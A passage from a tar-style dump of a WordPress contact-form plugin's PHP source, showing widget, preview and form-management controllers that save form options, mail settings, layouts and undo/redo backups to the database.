  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $this->display();
  }

  public function display() {
    require_once WD_FMC_DIR . "/admin/models/FMModelFormMakerPreview_fmc.php";
    $model = new FMModelFormMakerPreview_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewFormMakerPreview_fmc.php";
    $view = new FMViewFormMakerPreview_fmc($model);
    $view->display();
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerWidget_fmc.php000060400000006504152434416630015263 0ustar00<?php

class FMControllerWidget_fmc extends WP_Widget {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  private $view;
  private $model;
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
    $widget_ops = array(
      'classname' => 'form_maker_widget',
      'description' => 'Add Form Maker widget.'
    );
    // Widget Control Settings.
    $control_ops = array('id_base' => 'form_maker_widget');
    // Create the widget.
    parent::__construct('form_maker_widget', 'Contact Form Maker', $widget_ops, $control_ops);
    require_once WD_FMC_DIR . "/admin/models/FMModelWidget_fmc.php";
    $this->model = new FMModelWidget_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewWidget_fmc.php";
    $this->view = new FMViewWidget_fmc($this->model);
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////

  public function widget($args, $instance) {
    $this->view->widget($args, $instance);
	}

 	public function form( $instance ) {
    $this->view->form($instance, parent::get_field_id('title'), parent::get_field_name('title'), parent::get_field_id('form_id'), parent::get_field_name('form_id'));    
	}

	// Update Settings.
  public function update($new_instance, $old_instance) {
    $instance['title'] = $new_instance['title'];
    $instance['form_id'] = $new_instance['form_id'];
    return $instance;
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerManage_fmc.php000060400000143266152434416630015237 0ustar00<?php

class FMControllerManage_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $task = WDW_FMC_Library::get('task');
    $id = (int)WDW_FMC_Library::get('current_id', 0);
    $message = WDW_FMC_Library::get('message');
    echo WDW_FMC_Library::message_id($message);
    if (method_exists($this, $task)) {
		check_admin_referer('nonce_fmc', 'nonce_fmc');
		$this->$task($id);
    }
    else {
		$this->display();
    }
  }
public function undo()
{
    require_once WD_FMC_DIR . "/admin/models/FMModelManage_fmc.php";
    $model = new FMModelManage_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewManage_fmc.php";

    global $wpdb;	
    $backup_id = (int)WDW_FMC_Library::get('backup_id');
    $id = (int)WDW_FMC_Library::get('id');
	
	$query = "SELECT backup_id FROM ".$wpdb->prefix."formmaker_backup WHERE backup_id < $backup_id AND id = $id ORDER BY backup_id DESC LIMIT 0 , 1 ";
    $backup_id = $wpdb->get_var($query);
	
    $view = new FMViewManage_fmc($model);
    $view->edit($backup_id);

}
public function redo()
{
    require_once WD_FMC_DIR . "/admin/models/FMModelManage_fmc.php";
    $model = new FMModelManage_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewManage_fmc.php";
    global $wpdb;	
    $backup_id = (int)WDW_FMC_Library::get('backup_id');
    $id = (int)WDW_FMC_Library::get('id');
	
	$query = "SELECT backup_id FROM ".$wpdb->prefix."formmaker_backup WHERE backup_id > $backup_id AND id = $id ORDER BY backup_id ASC LIMIT 0 , 1 ";
    $backup_id = $wpdb->get_var($query);
 
	$view = new FMViewManage_fmc($model);
	$view->edit($backup_id);

}


  public function display() {
    require_once WD_FMC_DIR . "/admin/models/FMModelManage_fmc.php";
    $model = new FMModelManage_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewManage_fmc.php";
    $view = new FMViewManage_fmc($model);
    $view->display();
  }

  public function add() {
    require_once WD_FMC_DIR . "/admin/models/FMModelManage_fmc.php";
    $model = new FMModelManage_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewManage_fmc.php";
    $view = new FMViewManage_fmc($model);
    $view->edit(0);
  }

  public function edit() {
    require_once WD_FMC_DIR . "/admin/models/FMModelManage_fmc.php";
    $model = new FMModelManage_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewManage_fmc.php";
    $view = new FMViewManage_fmc($model);
    $id = (int)WDW_FMC_Library::get('current_id', 0);
	
    global $wpdb;	
	$query = "SELECT backup_id FROM ".$wpdb->prefix."formmaker_backup WHERE cur=1 and id=".$id;
    $backup_id = $wpdb->get_var($query);
	
	if(!$backup_id)
	{
		$query = "SELECT max(backup_id) FROM ".$wpdb->prefix."formmaker_backup";
		$backup_id = $wpdb->get_var($query);
		if($backup_id)
			$backup_id++;
		else
			$backup_id=1;
		$query = "INSERT INTO ".$wpdb->prefix."formmaker_backup SELECT ".$backup_id." AS backup_id, 1 AS cur, formmakerbkup.id, formmakerbkup.title, formmakerbkup.mail, formmakerbkup.form_front, formmakerbkup.theme, formmakerbkup.javascript, formmakerbkup.submit_text, formmakerbkup.url, formmakerbkup.submit_text_type, formmakerbkup.script_mail, formmakerbkup.script_mail_user, formmakerbkup.counter, formmakerbkup.published, formmakerbkup.label_order, formmakerbkup.label_order_current, formmakerbkup.article_id, formmakerbkup.pagination, formmakerbkup.show_title, formmakerbkup.show_numbers, formmakerbkup.public_key, formmakerbkup.private_key, formmakerbkup.recaptcha_theme, formmakerbkup.paypal_mode, formmakerbkup.checkout_mode, formmakerbkup.paypal_email, formmakerbkup.payment_currency, formmakerbkup.tax, formmakerbkup.form_fields, formmakerbkup.savedb, formmakerbkup.sendemail, formmakerbkup.requiredmark, formmakerbkup.from_mail, formmakerbkup.from_name, formmakerbkup.reply_to, formmakerbkup.send_to, formmakerbkup.autogen_layout, formmakerbkup.custom_front, formmakerbkup.mail_from_user, formmakerbkup.mail_from_name_user, formmakerbkup.reply_to_user, formmakerbkup.condition, formmakerbkup.mail_cc, formmakerbkup.mail_cc_user, formmakerbkup.mail_bcc, formmakerbkup.mail_bcc_user, formmakerbkup.mail_subject, formmakerbkup.mail_subject_user, formmakerbkup.mail_mode, formmakerbkup.mail_mode_user, formmakerbkup.mail_attachment, formmakerbkup.mail_attachment_user, formmakerbkup.user_id_wd, formmakerbkup.sortable, formmakerbkup.frontend_submit_fields, formmakerbkup.frontend_submit_stat_fields, formmakerbkup.mail_emptyfields, formmakerbkup.mail_verify, formmakerbkup.mail_verify_expiretime, formmakerbkup.mail_verification_post_id, formmakerbkup.save_uploads FROM ".$wpdb->prefix."formmaker as formmakerbkup WHERE id=".$id;
		$wpdb->query($query);
	}		

    $view->edit($backup_id);
  }

  public function edit_old() {
    require_once WD_FMC_DIR . "/admin/models/FMModelManage_fmc.php";
    $model = new FMModelManage_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewManage_fmc.php";
    $view = new FMViewManage_fmc($model);
    $id = (int)WDW_FMC_Library::get('current_id', 0);
    $view->edit_old($id);
  }

  public function form_options_old() {
    if (!isset($_GET['task'])) {
      $this->save_db();
    }
    require_once WD_FMC_DIR . "/admin/models/FMModelManage_fmc.php";
    $model = new FMModelManage_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewManage_fmc.php";
    $view = new FMViewManage_fmc($model);
    global $wpdb;
    $id = (int)WDW_FMC_Library::get('current_id', $wpdb->get_var("SELECT MAX(id) FROM " . $wpdb->prefix . "formmaker"));
    $view->form_options_old($id);
  }

  public function save_options_old() {
    $message = $this->save_db_options_old();
    // $this->edit_old();
    $page = WDW_FMC_Library::get('page');
    $current_id = (int)WDW_FMC_Library::get('current_id', 0);
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'edit_old', 'current_id' => $current_id, 'message' => $message), admin_url('admin.php')));
  }

  public function apply_options_old() {
    $message = $this->save_db_options_old();
    require_once WD_FMC_DIR . "/admin/models/FMModelManage_fmc.php";
    $model = new FMModelManage_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewManage_fmc.php";
    $view = new FMViewManage_fmc($model);
    $page = WDW_FMC_Library::get('page');
    $current_id = (int)WDW_FMC_Library::get('current_id', 0);
    $fieldset_id = WDW_FMC_Library::get('fieldset_id', 'general');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'form_options_old', 'current_id' => $current_id, 'message' => $message, 'fieldset_id' => $fieldset_id), admin_url('admin.php')));
  }

  public function save_db_options_old() {
    $javascript = "// Before the form is loaded.
function before_load() {
  
}	
// Before form submit.
function before_submit() {
  
}	
// Before form reset.
function before_reset() {
  
}";
    global $wpdb;
    $id = (int)WDW_FMC_Library::get('current_id', 0);
    $mail = (isset($_POST['mail']) ? esc_html(stripslashes($_POST['mail'])) : '');
    $theme = (isset($_POST['theme']) ? (int)esc_html(stripslashes($_POST['theme'])) : 1);
    $javascript = (isset($_POST['javascript']) ? stripslashes($_POST['javascript']) : $javascript);
    $script1 = (isset($_POST['script1']) ? esc_html(stripslashes($_POST['script1'])) : '');
    $script2 = (isset($_POST['script2']) ? esc_html(stripslashes($_POST['script2'])) : '');
    $script_user1 = (isset($_POST['script_user1']) ? esc_html(stripslashes($_POST['script_user1'])) : '');
    $script_user2 = (isset($_POST['script_user2']) ? esc_html(stripslashes($_POST['script_user2'])) : '');
    $submit_text = (isset($_POST['submit_text']) ? stripslashes($_POST['submit_text']) : '');
    $url = (isset($_POST['url']) ? esc_html(stripslashes($_POST['url'])) : '');
    $script_mail = (isset($_POST['script_mail']) ? stripslashes($_POST['script_mail']) : '%all%');
    $script_mail_user = (isset($_POST['script_mail_user']) ? stripslashes($_POST['script_mail_user']) : '%all%');
    $label_order_current = (isset($_POST['label_order_current']) ? esc_html(stripslashes($_POST['label_order_current'])) : '');
    $tax = (isset($_POST['tax']) ? esc_html(stripslashes($_POST['tax'])) : 0);
    $payment_currency = (isset($_POST['payment_currency']) ? stripslashes($_POST['payment_currency']) : '');
    $paypal_email = (isset($_POST['paypal_email']) ? esc_html(stripslashes($_POST['paypal_email'])) : '');
    $checkout_mode = (isset($_POST['checkout_mode']) ? esc_html(stripslashes($_POST['checkout_mode'])) : 'testmode');
    $paypal_mode = (isset($_POST['paypal_mode']) ? esc_html(stripslashes($_POST['paypal_mode'])) : 0);
    $from_mail = (isset($_POST['from_mail']) ? esc_html(stripslashes($_POST['from_mail'])) : '');
    $from_name = (isset($_POST['from_name']) ? esc_html(stripslashes($_POST['from_name'])) : '');
    if (isset($_POST['submit_text_type'])) {
      $submit_text_type = esc_html(stripslashes($_POST['submit_text_type']));
      if ($submit_text_type == 5) {
        $article_id = (isset($_POST['page_name']) ? esc_html(stripslashes($_POST['page_name'])) : 0);
      }
      else {
        $article_id = (isset($_POST['post_name']) ? esc_html(stripslashes($_POST['post_name'])) : 0);
      }
    }
    else {
      $submit_text_type = 0;
      $article_id = 0;
    }
    $save = $wpdb->update($wpdb->prefix . 'formmaker', array(
      'mail' => $mail,
      'theme' => $theme,
      'javascript' => $javascript,
      'submit_text' => $submit_text,
      'url' => $url,
      'submit_text_type' => $submit_text_type,
      'script_mail' => $script_mail,
      'script_mail_user' => $script_mail_user,
      'article_id' => $article_id,
      'paypal_mode' => $paypal_mode,
      'checkout_mode' => $checkout_mode,
      'paypal_email' => $paypal_email,
      'payment_currency' => $payment_currency,
      'tax' => $tax,
      'from_mail' => $from_mail,
      'from_name' => $from_name,                  
    ), array('id' => $id));
    if ($save !== FALSE) {
      return 8;
    }
    else {
      return 2;
    }
  }

  public function cancel_options_old() {
    $this->edit_old();
  }

  public function form_layout() {
    if (!isset($_GET['task'])) {
      $this->save_db();
    }
    require_once WD_FMC_DIR . "/admin/models/FMModelManage_fmc.php";
    $model = new FMModelManage_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewManage_fmc.php";
    $view = new FMViewManage_fmc($model);
    global $wpdb;
    $id = (int)WDW_FMC_Library::get('current_id', $wpdb->get_var("SELECT MAX(id) FROM " . $wpdb->prefix . "formmaker"));
    $view->form_layout($id);
  }

  public function save_layout() {
    $message = $this->save_db_layout();
    // $this->edit();
    $page = WDW_FMC_Library::get('page');
    $current_id = (int)WDW_FMC_Library::get('current_id', 0);
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'edit', 'current_id' => $current_id, 'message' => $message), admin_url('admin.php')));
  }

  public function apply_layout() {
    $message = $this->save_db_layout();
    require_once WD_FMC_DIR . "/admin/models/FMModelManage_fmc.php";
    $model = new FMModelManage_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewManage_fmc.php";
    $view = new FMViewManage_fmc($model);
    $page = WDW_FMC_Library::get('page');
    $current_id = (int)WDW_FMC_Library::get('current_id', 0);
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'form_layout', 'current_id' => $current_id, 'message' => $message), admin_url('admin.php')));
    // $view->form_layout($id);
  }

  public function save_db_layout() {
    global $wpdb;
    $id = (int)WDW_FMC_Library::get('current_id', 0);
    $custom_front = (isset($_POST['custom_front']) ? stripslashes($_POST['custom_front']) : '');
    $autogen_layout = (isset($_POST['autogen_layout']) ? 1 : 0);
    $save = $wpdb->update($wpdb->prefix . 'formmaker', array(
      'custom_front' => $custom_front,
      'autogen_layout' => $autogen_layout
    ), array('id' => $id));
    if ($save !== FALSE) {
      return 1;
    }
    else {
      return 2;
    }
  }

  public function form_options() {
    if (!isset($_GET['task'])) {
      $this->save_db();
    }
    require_once WD_FMC_DIR . "/admin/models/FMModelManage_fmc.php";
    $model = new FMModelManage_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewManage_fmc.php";
    $view = new FMViewManage_fmc($model);
    // $id = ((isset($_POST['current_id']) && esc_html($_POST['current_id']) != '') ? esc_html($_POST['current_id']) : 0);
    global $wpdb;
    $id = (int)WDW_FMC_Library::get('current_id', $wpdb->get_var("SELECT MAX(id) FROM " . $wpdb->prefix . "formmaker"));
    $view->form_options($id);
  }

  public function save_options() {
    $message = $this->save_db_options();
    // $this->edit();
    $page = WDW_FMC_Library::get('page');
    $current_id = (int)WDW_FMC_Library::get('current_id', 0);
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'edit', 'current_id' => $current_id, 'message' => $message), admin_url('admin.php')));
  }

  public function apply_options() {
    $message = $this->save_db_options();
    require_once WD_FMC_DIR . "/admin/models/FMModelManage_fmc.php";
    $model = new FMModelManage_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewManage_fmc.php";
    $view = new FMViewManage_fmc($model);
    // $id = ((isset($_POST['current_id']) && esc_html($_POST['current_id']) != '') ? esc_html($_POST['current_id']) : 0);
    // $view->form_options($id);
    $page = WDW_FMC_Library::get('page');
    $current_id = (int)WDW_FMC_Library::get('current_id', 0);
    $fieldset_id = WDW_FMC_Library::get('fieldset_id', 'general');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'form_options', 'current_id' => $current_id, 'message' => $message, 'fieldset_id' => $fieldset_id), admin_url('admin.php')));
  }

  public function remove_query() {
    global $wpdb;
    $cid = ((isset($_POST['cid']) && $_POST['cid'] != '') ? $_POST['cid'] : NULL); 
	if (count($cid)) {
      array_walk($cid, create_function('&$value', '$value = (int)$value;')); 
      $cids = implode(',', $cid);
      $query = 'DELETE FROM ' . $wpdb->prefix . 'formmaker_query WHERE id IN ( ' . $cids . ' )';
      if ($wpdb->query($query)) {
        echo WDW_FMC_Library::message('Items Succesfully Deleted.', 'updated');
      }
      else {
        echo WDW_FMC_Library::message('Error. Please install plugin again.', 'error');
      }
    }
    else {
      echo WDW_FMC_Library::message('You must select at least one item.', 'error');
    }
    $this->apply_options();
  }
  
  public function cancel_options() {
    $this->edit();
  }

  public function save_db_options() {
    $javascript = "// Before the form is loaded.
function before_load() {
  
}	
// Before form submit.
function before_submit() {
  
}	
// Before form reset.
function before_reset() {
  
}";
    global $wpdb;
    // $id = (isset($_POST['current_id']) ? (int) esc_html(stripslashes($_POST['current_id'])) : 0);
    $id = (int)WDW_FMC_Library::get('current_id', 0);
    $published = (isset($_POST['published']) ? esc_html(stripslashes($_POST['published'])) : 1);
    $savedb = (isset($_POST['savedb']) ? esc_html(stripslashes($_POST['savedb'])) : 1);
    $theme = (int)((isset($_POST['theme']) && (esc_html($_POST['theme']) != 0)) ? esc_html(stripslashes($_POST['theme'])) : $wpdb->get_var("SELECT id FROM " . $wpdb->prefix . "formmaker_themes WHERE `default`='1'"));
    $requiredmark = (isset($_POST['requiredmark']) ? esc_html(stripslashes($_POST['requiredmark'])) : '*');
    $sendemail = (isset($_POST['sendemail']) ? esc_html(stripslashes($_POST['sendemail'])) : 1);
    $save_uploads = (isset($_POST['save_uploads']) ? esc_html(stripslashes($_POST['save_uploads'])) : 1);
    $mail = (isset($_POST['mail']) ? esc_html(stripslashes($_POST['mail'])) : '');
    if (isset($_POST['mailToAdd']) && esc_html(stripslashes($_POST['mailToAdd'])) != '') {
      $mail .= esc_html(stripslashes($_POST['mailToAdd'])) . ',';
    }
    $from_mail = (isset($_POST['from_mail']) ? esc_html(stripslashes($_POST['from_mail'])) : '');
    $from_name = (isset($_POST['from_name']) ? esc_html(stripslashes($_POST['from_name'])) : '');
    $reply_to = (isset($_POST['reply_to']) ? esc_html(stripslashes($_POST['reply_to'])) : '');
    if ($from_mail == "other") {
      $from_mail = (isset($_POST['mail_from_other']) ? esc_html(stripslashes($_POST['mail_from_other'])) : '');
    }
    if ($reply_to == "other") {
      $reply_to = (isset($_POST['reply_to_other']) ? esc_html(stripslashes($_POST['reply_to_other'])) : '');
    }
    $script_mail = (isset($_POST['script_mail']) ? stripslashes($_POST['script_mail']) : '%all%');
    $mail_from_user = (isset($_POST['mail_from_user']) ? esc_html(stripslashes($_POST['mail_from_user'])) : '');
    $mail_from_name_user = (isset($_POST['mail_from_name_user']) ? esc_html(stripslashes($_POST['mail_from_name_user'])) : '');
    $reply_to_user = (isset($_POST['reply_to_user']) ? esc_html(stripslashes($_POST['reply_to_user'])) : '');
    $condition = (isset($_POST['condition']) ? esc_html(stripslashes($_POST['condition'])) : '');
    $mail_cc = (isset($_POST['mail_cc']) ? esc_html(stripslashes($_POST['mail_cc'])) : '');
    $mail_cc_user = (isset($_POST['mail_cc_user']) ? esc_html(stripslashes($_POST['mail_cc_user'])) : '');
    $mail_bcc = (isset($_POST['mail_bcc']) ? esc_html(stripslashes($_POST['mail_bcc'])) : '');
    $mail_bcc_user = (isset($_POST['mail_bcc_user']) ? esc_html(stripslashes($_POST['mail_bcc_user'])) : '');
    $mail_subject = (isset($_POST['mail_subject']) ? esc_html(stripslashes($_POST['mail_subject'])) : '');
    $mail_subject_user = (isset($_POST['mail_subject_user']) ? esc_html(stripslashes($_POST['mail_subject_user'])) : '');
    $mail_mode = (isset($_POST['mail_mode']) ? esc_html(stripslashes($_POST['mail_mode'])) : 1);
    $mail_mode_user = (isset($_POST['mail_mode_user']) ? esc_html(stripslashes($_POST['mail_mode_user'])) : 1);
    $mail_attachment = (isset($_POST['mail_attachment']) ? esc_html(stripslashes($_POST['mail_attachment'])) : 1);
    $mail_attachment_user = (isset($_POST['mail_attachment_user']) ? esc_html(stripslashes($_POST['mail_attachment_user'])) : 1);
    $script_mail_user = (isset($_POST['script_mail_user']) ? stripslashes($_POST['script_mail_user']) : '%all%');
    $submit_text = (isset($_POST['submit_text']) ? stripslashes($_POST['submit_text']) : '');
    $url = (isset($_POST['url']) ? esc_html(stripslashes($_POST['url'])) : '');
    $tax = (isset($_POST['tax']) ? esc_html(stripslashes($_POST['tax'])) : 0);
    $payment_currency = (isset($_POST['payment_currency']) ? stripslashes($_POST['payment_currency']) : '');
    $paypal_email = (isset($_POST['paypal_email']) ? esc_html(stripslashes($_POST['paypal_email'])) : '');
    $checkout_mode = (isset($_POST['checkout_mode']) ? esc_html(stripslashes($_POST['checkout_mode'])) : 'testmode');
    $paypal_mode = (isset($_POST['paypal_mode']) ? esc_html(stripslashes($_POST['paypal_mode'])) : 0);
    $javascript = (isset($_POST['javascript']) ? stripslashes($_POST['javascript']) : $javascript);
    $user_id_wd = (isset($_POST['user_id_wd']) ? stripslashes($_POST['user_id_wd']) : 'administrator,');
    $frontend_submit_fields = (isset($_POST['frontend_submit_fields']) ? stripslashes($_POST['frontend_submit_fields']) : '');
    $frontend_submit_stat_fields = (isset($_POST['frontend_submit_stat_fields']) ? stripslashes($_POST['frontend_submit_stat_fields']) : '');
	$mail_emptyfields = (isset($_POST['mail_emptyfields']) ? esc_html(stripslashes($_POST['mail_emptyfields'])) : 0);
	$mail_verify = (isset($_POST['mail_verify']) ? esc_html(stripslashes($_POST['mail_verify'])) : 0);
	$mail_verify_expiretime = (isset($_POST['mail_verify_expiretime']) ? esc_html(stripslashes($_POST['mail_verify_expiretime'])) : '');
    $send_to = '';
    for ($i = 0; $i < 20; $i++) {
      if (isset($_POST['send_to' . $i])) {
        $send_to .= '*' . esc_html(stripslashes($_POST['send_to' . $i])) . '*';
      }
    }
    if (isset($_POST['submit_text_type'])) {
      $submit_text_type = esc_html(stripslashes($_POST['submit_text_type']));
      if ($submit_text_type == 5) {
        $article_id = (isset($_POST['page_name']) ? esc_html(stripslashes($_POST['page_name'])) : 0);
      }
      else {
        $article_id = (isset($_POST['post_name']) ? esc_html(stripslashes($_POST['post_name'])) : 0);
      }
    }
    else {
      $submit_text_type = 0;
      $article_id = 0;
    }
	
	$mail_verification_post_id = (int)$wpdb->get_var('SELECT mail_verification_post_id FROM ' . $wpdb->prefix . 'formmaker WHERE mail_verification_post_id!=0');
	if($mail_verify) {
		$email_verification_post = array(
		  'post_title'    => 'Email Verification',
		  'post_content'  => '[email_verification]',
		  'post_status'   => 'publish',
		  'post_author'   => 1,
		  'post_type'   => 'fmemailverification',
		);

		if(!$mail_verification_post_id || get_post( $mail_verification_post_id )===NULL)
			$mail_verification_post_id = wp_insert_post( $email_verification_post );
	}
	
    $save = $wpdb->update($wpdb->prefix . 'formmaker', array(
      'published' => $published,
      'savedb' => $savedb,
      'theme' => $theme,
      'requiredmark' => $requiredmark,
      'sendemail' => $sendemail,
      'save_uploads' => $save_uploads,
      'mail' => $mail,
      'from_mail' => $from_mail,
      'from_name' => $from_name,
      'reply_to' => $reply_to,
      'script_mail' => $script_mail,
      'mail_from_user' => $mail_from_user,
      'mail_from_name_user' => $mail_from_name_user,
      'reply_to_user' => $reply_to_user,
      'condition' => $condition,
      'mail_cc' => $mail_cc,
      'mail_cc_user' => $mail_cc_user,
      'mail_bcc' => $mail_bcc,
      'mail_bcc_user' => $mail_bcc_user,
      'mail_subject' => $mail_subject,
      'mail_subject_user' => $mail_subject_user,
      'mail_mode' => $mail_mode,
      'mail_mode_user' => $mail_mode_user,
      'mail_attachment' => $mail_attachment,
      'mail_attachment_user' => $mail_attachment_user,
      'script_mail_user' => $script_mail_user,
      'submit_text' => $submit_text,
      'url' => $url,
      'submit_text_type' => $submit_text_type,
      'article_id' => $article_id,
      'tax' => $tax,
      'payment_currency' => $payment_currency,
      'paypal_email' => $paypal_email,
      'checkout_mode' => $checkout_mode,
      'paypal_mode' => $paypal_mode,
      'javascript' => $javascript,
      'user_id_wd' => $user_id_wd,
      'send_to' => $send_to,
      'frontend_submit_fields' => $frontend_submit_fields,
      'frontend_submit_stat_fields' => $frontend_submit_stat_fields,
	  'mail_emptyfields' => $mail_emptyfields,
	  'mail_verify' => $mail_verify,
	  'mail_verify_expiretime' => $mail_verify_expiretime,
	  'mail_verification_post_id' => $mail_verification_post_id,
    ), array('id' => $id));
    if ($save !== FALSE) {
		$save_theme_in_backup = $wpdb->update($wpdb->prefix . 'formmaker_backup', array(
			'theme' => $theme
		), array('id' => $id));
		return 8;
    }
    else {
		return 2;
    }
  }

  public function save_as_copy_old() {
    $message = $this->save_db_as_copy_old();
    // $this->display();
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'display', 'message' => $message), admin_url('admin.php')));
  }

  public function save_old() {
    $message = $this->save_db_old();
    // $this->display();
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'display', 'message' => $message), admin_url('admin.php')));
  }

  public function apply_old() {
    global $wpdb;
    $message = $this->save_db_old();
    // $this->edit_old();
    $id = (int) $wpdb->get_var("SELECT MAX(id) FROM " . $wpdb->prefix . "formmaker");
    $current_id = (int)WDW_FMC_Library::get('current_id', $id);
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'edit_old', 'current_id' => $current_id, 'message' => $message), admin_url('admin.php')));
  }

  public function save_db_old() {
    global $wpdb;
    // $id = (isset($_POST['current_id']) ? (int) esc_html(stripslashes($_POST['current_id'])) : 0);
    $id = (int)WDW_FMC_Library::get('current_id', 0);
    $title = (isset($_POST['title']) ? esc_html(stripslashes($_POST['title'])) : '');
    $form = (isset($_POST['form']) ? stripslashes($_POST['form']) : '');
    $form_front = (isset($_POST['form_front']) ? stripslashes($_POST['form_front']) : '');
    $counter = (isset($_POST['counter']) ? esc_html(stripslashes($_POST['counter'])) : 0);
    $label_order = (isset($_POST['label_order']) ? esc_html(stripslashes($_POST['label_order'])) : '');
    $label_order_current = (isset($_POST['label_order_current']) ? esc_html(stripslashes($_POST['label_order_current'])) : '');
    $pagination = (isset($_POST['pagination']) ? esc_html(stripslashes($_POST['pagination'])) : '');
    $show_title = (isset($_POST['show_title']) ? esc_html(stripslashes($_POST['show_title'])) : '');
    $show_numbers = (isset($_POST['show_numbers']) ? esc_html(stripslashes($_POST['show_numbers'])) : '');
    $public_key = (isset($_POST['public_key']) ? esc_html(stripslashes($_POST['public_key'])) : '');
    $private_key = (isset($_POST['private_key']) ? esc_html(stripslashes($_POST['private_key'])) : '');
    $recaptcha_theme = (isset($_POST['recaptcha_theme']) ? esc_html(stripslashes($_POST['recaptcha_theme'])) : '');

    $save = $wpdb->update($wpdb->prefix . 'formmaker', array(
      'title' => $title,
      'form' => $form,
      'form_front' => $form_front,
      'counter' => $counter,
      'label_order' => $label_order,
      'label_order_current' => $label_order_current,
      'pagination' => $pagination,
      'show_title' => $show_title,
      'show_numbers' => $show_numbers,
      'public_key' => $public_key,
      'private_key' => $private_key,
      'recaptcha_theme' => $recaptcha_theme,                   
    ), array('id' => $id));
    if ($save !== FALSE) {
      return 1;
    }
    else {
      return 2;
    }
  }

  public function save_db_as_copy_old() {
    global $wpdb;
    // $id = (isset($_POST['current_id']) ? (int) esc_html(stripslashes($_POST['current_id'])) : 0);
    $id = (int)WDW_FMC_Library::get('current_id', 0);
    $row = $wpdb->get_row($wpdb->prepare('SELECT * FROM ' . $wpdb->prefix . 'formmaker WHERE id="%d"', $id));
    $title = (isset($_POST['title']) ? esc_html(stripslashes($_POST['title'])) : '');
    $form = (isset($_POST['form']) ? stripslashes($_POST['form']) : '');
    $form_front = (isset($_POST['form_front']) ? stripslashes($_POST['form_front']) : '');
    $counter = (isset($_POST['counter']) ? esc_html(stripslashes($_POST['counter'])) : 0);
    $label_order = (isset($_POST['label_order']) ? esc_html(stripslashes($_POST['label_order'])) : '');
    $pagination = (isset($_POST['pagination']) ? esc_html(stripslashes($_POST['pagination'])) : '');
    $show_title = (isset($_POST['show_title']) ? esc_html(stripslashes($_POST['show_title'])) : '');
    $show_numbers = (isset($_POST['show_numbers']) ? esc_html(stripslashes($_POST['show_numbers'])) : '');
    $public_key = (isset($_POST['public_key']) ? esc_html(stripslashes($_POST['public_key'])) : '');
    $private_key = (isset($_POST['private_key']) ? esc_html(stripslashes($_POST['private_key'])) : '');
    $recaptcha_theme = (isset($_POST['recaptcha_theme']) ? esc_html(stripslashes($_POST['recaptcha_theme'])) : '');

    $save = $wpdb->insert($wpdb->prefix . 'formmaker', array(
      'title' => $title,
      'mail' => $row->mail,
      'form' => $form,
      'form_front' => $form_front,
      'theme' => $row->theme,
      'counter' => $counter,
      'label_order' => $label_order,
      'pagination' => $pagination,
      'show_title' => $show_title,
      'show_numbers' => $show_numbers,
      'public_key' => $public_key,
      'private_key' => $private_key,
      'recaptcha_theme' => $recaptcha_theme,
